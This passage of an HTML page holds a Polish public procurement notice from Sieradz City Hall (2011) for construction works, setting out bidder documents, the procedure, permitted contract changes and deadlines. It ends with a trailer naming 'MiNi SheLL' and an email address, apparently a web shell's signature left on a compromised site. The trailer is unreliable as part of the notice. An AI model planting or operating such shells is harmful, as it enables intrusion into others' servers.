- Zamawiający wymaga, aby Wykonawca posiadał aktualną i opłaconą polisę OC z sumą ubezpieczenia na kwotę min.3.000.000,00  złotych. Na potwierdzenie spełnienia warunku Wykonawca przedstawi polisę wraz dokumentem potwierdzającym jej opłacenie  lub inny dokument potwierdzający posiadanie ubezpieczenia OC.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wzór proponowanej do zawarcia umowy stanowi załącznik nr 3 do niniejszej SIWZ.
2.Strony zastrzegają możliwość dokonania w uzasadnionych okolicznościach zmian postanowień niniejszej umowy. Wszelkie zmiany treści umowy wymagają pod rygorem nieważności zachowania formy pisemnej.
3.Zmiana określenia przedmiotu zamówienia w porównaniu do postanowień SIWZ w postępowaniu o udzielenie zamówienia publicznego, w wyniku przeprowadzenia, którego zawarto niniejszą umowę możliwa jest jedynie w przypadku, gdy prowadzi do jego ograniczenia lub zastosowania rozwiązań zamiennych tj. takich, które nie powodują rozszerzenia określenia przedmiotu zamówienia, prowadzą do jego ulepszenia, usprawnienia jego realizacji lub zastosowania materiałów równoważnych.
4.Zamawiający przewiduje możliwość zmiany terminu wykonania umowy, w przypadku wystąpienia okoliczności niezależnych od stron umowy:
a)niesprzyjające warunki atmosferyczne uniemożliwiające prowadzenie robót,
b)likwidacja kolizji z urządzeniami, obiektami, znaleziskami (w tym: archeologicznymi), których istnienia nie przewidywała dokumentacja  projektowa lub których lokalizacja jest rozbieżna z treścią dokumentacji projektowej,
c)wystąpienie warunków gruntowo-wodnych radykalnie rozbieżnych w stosunku do przewidywanych w dokumentacji projektowej np. powodujących konieczność zmian w technologii robót,
d)wystąpienia konieczności wykonania robót nieprzewidzianych i nie uwzględnionych w dokumentacji projektowej tj. robót dodatkowych koniecznych do wykonania podstawowego przedmiotu zamówienia
e)koniecznością wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa,
f)działaniem siły wyższej w rozumieniu przepisów Kodeksu Cywilnego,
g)nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazania przez Zamawiającego terenu budowy Wykonawcy,
h)wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę,
i)opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów,
j)innymi okolicznościami niepowstałymi z winy Wykonawcy
5.Każda ze stron może wystąpić z propozycją zmian postanowień niniejszej umowy. Propozycja musi wskazywać na  okoliczności uzasadniające wprowadzenie zmian.
6.Strony ustalają, że Wykonawca nie może bez zgody Zamawiającego dokonać cesji  wierzytelności na rzecz osoby trzeciej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umsieradz.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sieradza
Plac Wojewódzki 1
98-200 Sieradz
pokój nr 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2011 godzina 09:00, miejsce: Biuro Obsługi Klientów
Urząd Miasta Sieradza
Plac Wojewódzki 1
98-200 Sieradz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com